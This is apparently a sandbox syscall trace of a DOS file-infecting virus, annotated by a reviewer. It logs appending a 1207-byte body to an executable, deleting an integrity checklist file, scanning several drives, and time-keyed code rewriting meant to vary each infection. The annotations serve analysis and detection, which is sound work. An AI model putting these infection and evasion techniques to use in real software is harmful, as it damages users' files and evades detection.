2018-12-25T12:23:32.207585088Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.20856221Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.209625151Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.210939373Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.211855326Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.212921131Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.214185185Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.215110395Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.216340931Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.217461411Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.218346763Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.219960416Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.220866173Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.221723403Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.223360404Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.22421173Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.225094139Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.22647897Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.227291188Z 53 PC: 14fba | Get interrupt vector (See above)
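2018-12-25T12:23:32.228087369Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.22990092Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:32.230977655Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:32.232024412Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
[Note: on Get/Set interrupt vector rows the 'AKA' text is the name of the INT 21h function with the same number, not the name of the interrupt vector. Vector 0 (00h) is the divide-error vector, 35 (23h) the Ctrl-Break handler, 36 (24h) the critical-error handler, and 63 (3Fh) is conventionally used by overlay managers.]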
2018-12-25T12:23:32.233829367Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:32.397774444Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:32.399364258Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.401123416Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.402160721Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.403122237Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.405440497Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.406474161Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.407479346Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.408988572Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.410013837Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.411019173Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.412401495Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.413365458Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.414314947Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.416364815Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.41741003Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.418456785Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.419921055Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.421123393Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.42218134Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:32.423913279Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.425826499Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.427756165Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.42991225Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.431823775Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.433944048Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.436223987Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.438075578Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.440135648Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.442431315Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.444277813Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.44837421Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.450503368Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.452403702Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.455011235Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.456943565Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.458928002Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.461688439Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.463703028Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.465661828Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.467813204Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.469212297Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.47055886Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.472446595Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.4745529Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.476284281Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.478796242Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.480671742Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.482444783Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.484835293Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.487382303Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.489086806Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.494651925Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:32.498307319Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":9667,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:29.451952754Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:29.45370398Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:29.456639355Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:29.457769026Z 78 PC: 15408 | Find first file
2018-12-25T12:23:29.464328312Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:29.47499263Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:29.491361741Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:29.49842808Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:29.499806284Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:29.505952758Z 66 PC: 154a6 | Move file pointer
; Snapshot taken at the return address of an INT 21h AH=2Ch (Get time) call;
; DX holds seconds (DH) and hundredths (DL). Each loop converts 8 bits of a
; time value into 8 bytes, written one after another from [bp + 0x556]. The
; first loop writes 0xF8 (CLC opcode) or 0xFC (CLD opcode). The second writes
; 0x90 (NOP opcode) or 0xF5 (CMC opcode). The buffer contents therefore vary
; from run to run.
; NOTE(review): bp presumably holds the code's load offset; not visible here.
2018-12-25T12:23:29.507333962Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]  ; di = one byte before the buffer
0x15512: inc di  ; advance one byte per pass
0x15513: shl dx, 1  ; CF = next bit of the time value
0x15515: jb 0x1551e  ; bit set -> 0xFC, bit clear -> 0xF8
0x15517: mov word ptr [di], 0xf8  ; word store; its high 0x00 byte is overwritten by the next store
0x1551b: jmp 0x15522
0x1551d: nop  ; not reached: follows an unconditional jmp
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512  ; 8 passes (cx = 8)
0x15524: mov ah, 0x2c  ; Get time again for a new DX
0x15526: int 0x21
0x15528: mov cx, 8  ; second pass of 8, di keeps advancing
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop  ; not reached: follows an unconditional jmp
0x15537: mov word ptr [di], 0xf5
; Snapshot taken at the return address of the second Get time call. After the
; second fill loop (0x90 / 0xF5 bytes), a third Get time supplies the write
; length: cx = DL & 0x0F, i.e. 0..15 bytes taken from [bp + 0x556]. In this run
; the trace row for PC 15550 records the write as 8 bytes on handle 5.
2018-12-25T12:23:29.515289597Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di  ; di continues from the earlier fill loop
0x1552c: shl dx, 1  ; CF = next bit of the time value
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop  ; not reached: follows an unconditional jmp
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c  ; Get time
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf  ; cx = low 4 bits of DL (hundredths)
0x15548: mov ah, 0x40  ; INT 21h AH=40h: write CX bytes from DS:DX to handle BX
0x1554a: lea dx, word ptr [bp + 0x556]  ; start of the buffer filled above
0x1554e: int 0x21  ; BX (file handle) is set outside this window
0x15550: jmp 0x15555  ; jumps over the three bytes that follow
0x15552: nop
0x15553: add byte ptr [bx + si], al  ; skipped by the jmp; likely data bytes decoded as code
; Snapshot taken at the return address of the third Get time call. Two writes
; follow: a time-dependent 0..15 bytes from [bp + 0x556], then a fixed
; 0x4b7 = 1207 bytes from [bp + 0x10]. The trace row for PC 1556c records the
; latter as "Write 1207 bytes on handle 5".
; NOTE(review): the routine called at 0x1555e is not shown. Its printed target
; 0x2514a lies 0x10000 above every traced PC, which may be the disassembler not
; wrapping a 16-bit near call; unconfirmed.
2018-12-25T12:23:29.517361907Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf  ; cx = low 4 bits of DL (hundredths)
0x15548: mov ah, 0x40  ; INT 21h AH=40h: write CX bytes from DS:DX to handle BX
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555  ; jumps over the three bytes that follow
0x15552: nop
0x15553: add byte ptr [bx + si], al  ; skipped by the jmp; likely data bytes decoded as code
0x15555: mov ah, 0x2c  ; Get time
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx  ; keep the time value (seconds/hundredths) at [bp + 0x30]
0x1555e: call 0x2514a  ; routine not shown in this trace
0x15561: mov ah, 0x40  ; write file
0x15563: mov cx, 0x4b7  ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c  ; Get time
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:29.51938073Z 64 PC: 15550 | Write file or device (Write 8 bytes on handle 5)
; Snapshot taken at the return address of the Get time call at 0x15555, before
; the first call to 0x2514a. Here the bytes from 0x1557e onward decode as
; ordinary code (seek to end of file). The next snapshot, taken at PC 15570,
; shows different bytes at those addresses.
; NOTE(review): the value stored at [bp + 0x30] is presumably used by the
; routine at 0x2514a; that routine is not shown, so this is unconfirmed.
2018-12-25T12:23:29.526552637Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a  ; routine not shown in this trace
0x15561: mov ah, 0x40  ; INT 21h AH=40h: write CX bytes from DS:DX to handle BX
0x15563: mov cx, 0x4b7  ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c  ; Get time
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f  ; cx = low 6 bits of DL, i.e. 0..63
0x15577: mov ah, 0x40  ; write file; DX is not reloaded, so the buffer address is the time value itself
0x15579: int 0x21
0x1557b: call 0x2514a  ; second call to the same routine
0x1557e: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x15581: xor cx, cx
0x15583: xor dx, dx  ; offset CX:DX = 0
0x15585: int 0x21  ; returns the new position in DX:AX
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:29.528877875Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
; Snapshot taken at the return address of the Get time call at 0x1556c, i.e.
; between the two calls to 0x2514a. Only 0x15570..0x1557b is meaningful here.
; From 0x1557e onward the bytes differ from the snapshot taken at PC 15559,
; where the same addresses read "mov ax, 0x4202 / xor cx, cx / xor dx, dx /
; int 0x21". The lines below 0x1557b are a decode of rewritten bytes, not of
; instructions that run in this form (into, enter and retf are artifacts).
; The other run on this page with the same "OriginalID" shows different bytes
; again at these addresses.
; NOTE(review): this is consistent with an in-place transform keyed by the time
; value saved at [bp + 0x30]; the routine at 0x2514a is not shown, so treat it
; as unconfirmed. For detection it means the 1207-byte body written to the file
; is unlikely to be byte-identical across infections.
2018-12-25T12:23:29.53706821Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f  ; cx = low 6 bits of DL, i.e. 0..63
0x15577: mov ah, 0x40  ; write file; DX still holds the time value, so it is used as the buffer address
0x15579: int 0x21  ; logged at PC 1557b as a 24-byte write in this run
0x1557b: call 0x2514a  ; routine not shown in this trace
0x1557e: mov al, byte ptr [0x5a01]  ; from here on: decode of rewritten bytes, see header
0x15581: xor cl, dl
0x15583: xor dl, cl
0x15585: into
0x15586: cmp word ptr [bp + di - 0x57], dx
0x15589: or cl, bl
0x1558b: jmp 0x15558
0x1558d: leave
0x1558e: loope 0x155a0
0x15590: enter -0x67a5, -0x19
0x15594: sbb word ptr [di], di
0x15596: xchg ax, cx
0x15597: xchg ax, bp
0x15598: retf
2018-12-25T12:23:29.539887579Z 64 PC: 1557b | Write file or device (Write 24 bytes on handle 5)
2018-12-25T12:23:29.543090294Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:29.544789602Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:29.54758163Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:29.550254031Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:29.5563432Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:29.562047727Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:29.563601355Z 62 PC: 155d0 | Close file
2018-12-25T12:23:29.570934872Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:29.581281678Z 79 PC: 1541f | Find next file
2018-12-25T12:23:29.583784051Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:29.587974931Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:29.589889562Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:29.590978477Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:29.596025572Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:29.599634416Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:29.605410295Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:29.606398686Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:29.614911651Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:29.621192045Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:30.916459918Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:30.927001579Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:30.928489592Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:30.933874539Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:30.936336826Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:30.938753577Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:30.941255123Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:30.943984816Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:30.951274057Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:30.954035744Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:30.979503685Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:30.982637546Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:30.985565165Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:30.988146264Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:30.990469047Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:30.993235997Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.001731724Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.009147849Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.010705791Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.067246598Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.086804895Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.090110431Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.097249602Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.132405744Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.140996045Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.143136989Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.149829384Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.152041346Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.154907437Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.158082307Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.160313582Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.166463063Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.175601927Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.22625583Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.229017186Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.232770475Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.234351796Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.235818203Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.239079419Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.245424638Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.254343898Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.256723503Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.265835438Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.275662494Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.284517493Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.298771183Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.308963927Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.315496451Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.318012252Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.323440636Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.324900925Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.32770701Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.329879882Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.331843234Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.342696469Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.345010643Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:31.354228483Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:31.357349324Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:31.36075673Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:31.362425182Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:31.364742289Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:31.368028802Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:31.37397692Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:31.382775053Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:31.384559511Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:31.398450635Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:31.580362423Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:31.583907714Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:31.589850734Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:31.770167647Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:31.777114734Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:31.778442133Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:31.784690577Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:31.786359149Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:31.788381477Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:31.79057799Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:31.792720966Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:31.799128831Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:31.801667076Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.005830654Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.008036494Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.010864769Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.012526747Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.013748064Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.016432378Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.022658926Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.028706989Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.030036107Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.059786372Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.069217452Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:32.072223002Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:32.079574651Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:32.089525958Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:32.096304209Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:32.098710137Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:32.104859704Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:32.106626013Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:32.109878645Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:32.112353644Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:32.114820111Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:32.123219637Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:32.126051693Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:32.139195458Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:32.142475789Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:32.145706686Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:32.147267179Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:32.149308429Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:32.152441502Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:32.158386627Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:32.165313063Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:32.166938421Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:32.173571397Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:32.470343861Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:32.473271386Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.478428632Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.484447808Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:32.486096866Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:32.490078861Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:32.492794543Z 59 PC: 15220 | Change current directory
; Capture taken at the instruction after INT 21h AH=2Ch (Get time), which
; returns CH=hour, CL=minute, DH=second, DL=hundredths. The code compares the
; minute in CL against five fixed values and calls a routine for each match;
; any other minute falls straight through to 0x15270.
; NOTE(review): in this run the next trace rows are Get interrupt vector, with
; no Find first / Delete file rows, so the 0x15330 branches do not appear to
; have been taken here; confirm against the clock value the job used.
2018-12-25T12:23:32.496408347Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5  ; minute == 5 ?
0x1523f: jne 0x15244
0x15241: call 0x1534a  ; minute-5 action; routine body is not in this listing
0x15244: cmp cl, 0xd  ; minute == 13 ?
0x15247: jne 0x1524c
0x15249: call 0x15359  ; minute-13 action; routine body is not in this listing
0x1524c: cmp cl, 0x1e  ; minute == 30 ?
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]  ; DX = address of data at bp+0x290, passed to 0x15330
0x15255: call 0x15330
0x15258: cmp cl, 0x28  ; minute == 40 ? (same argument as the minute-30 case)
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32  ; minute == 50 ? (different argument: bp+0x2c7)
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]  ; common continuation; what SI/DI are used for lies past the capture window
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:32.521939405Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:32.52414764Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.525298505Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.526862967Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.528910743Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.530161948Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.531379913Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.533299544Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.534787486Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.536250027Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.538644428Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.540065068Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.541512245Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.543744525Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.545472195Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.54687673Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.549072758Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.55075908Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:32.552146513Z 53 PC: 14fba | Get interrupt vector (See above)
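2018-12-25T12:23:32.55401439Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate') [the AKA text is the INT 21h function name for that number, not a vector name; vector 0x00 is the CPU divide-error vector]
2018-12-25T12:23:32.555648165Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records') [35 = vector 0x23, the DOS Ctrl-Break handler]
2018-12-25T12:23:32.556806979Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [36 = vector 0x24, the DOS critical-error handler]
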